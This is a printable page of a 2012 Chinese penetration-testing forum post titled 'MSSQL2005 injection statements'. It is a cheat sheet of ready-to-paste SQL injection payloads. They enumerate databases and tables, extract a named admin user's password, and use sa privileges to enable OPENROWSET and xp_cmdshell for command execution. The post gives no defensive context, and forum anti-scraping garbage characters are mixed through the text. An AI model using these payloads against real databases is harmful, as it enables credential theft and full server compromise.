中国网络渗透测试联盟

标题: MSsql2005注入语句 [打印本页]

作者: admin    时间: 2012-9-13 17:19
标题: MSsql2005注入语句

' |1 w- H/ \5 I, h2 ~3 F, q& H. _- {4 A4 h- i  k
; z* O3 J# {9 @( L4 |
[Copy to clipboard]CODE:8 a# K7 r2 z9 Y9 F" p% z. S' y8 q
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
: X6 p# i, a' P! V: g2 p) F
0 M" r) Y% b5 ]$ z$ u% A. l爆表语句,somedb部份是所要列的数据库,红色数字1累加
3 m6 \# i5 [6 g' L$ Z! _/ O9 `
. c- z( _) E& l2 e. v2 m0 l" n, Z3 G( I: y9 r# c
[Copy to clipboard]CODE:
! h$ |$ D8 c: q! E( s3 M  s0 z1 }# h' a/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--8 [) O( I8 C9 ?7 N! o4 J/ b5 {9 {
+ f4 ]" F; F) w( A8 n+ o: P
爆字段语句,爆表admin里user='icerover'的密码段& Y1 C7 I, t) ]/ {% Z7 G& j$ i
% e  G& d( e' Y" b8 Q
4 U9 x" {# Y  p. q: p) }) `8 J
[Copy to clipboard]CODE:
! p. p# E4 T" P**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 N9 B  V8 a- U
- U8 y: S' l  @9 J$ n2 I: Q! Ymssql2005默认没有开xp_cmdshell的,openrowset也不能用/ }) G% X$ {# o" y7 D2 A
如果是sa权限,可以这样来开启
3 r8 P: H$ L6 |8 V; @% ~开启openrowset) w" c  J2 d# h/ H* r* [
7 @5 X4 I3 z2 J' I, Q0 X* P  V
: m5 B' s# Q. h, T5 `" Y2 M
[Copy to clipboard]CODE:
" J; H( C8 M4 g7 v. ?9 e% ^6 d/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--; {* L2 F2 t1 Q+ U
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 G1 f* @' s$ `9 @+ e
/ l, j! y) p  _+ ?, [0 Z! j开启xp_cmdshell0 x* f$ v( ]7 m7 v- g
2 V) V8 a5 Q, ~  g! @
! q, H3 T5 T9 q
[Copy to clipboard]CODE:
: M9 _3 a, y/ ]5 I. H1 {EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
) g. y; j) R" x5 X1 K" sEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
, b1 y3 U* c6 M5 \1 _* v2 n* M# Y  P/ X+ m
ok,over~~晚安: ?0 u( w) w7 ^. F" a- ~, k: `





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2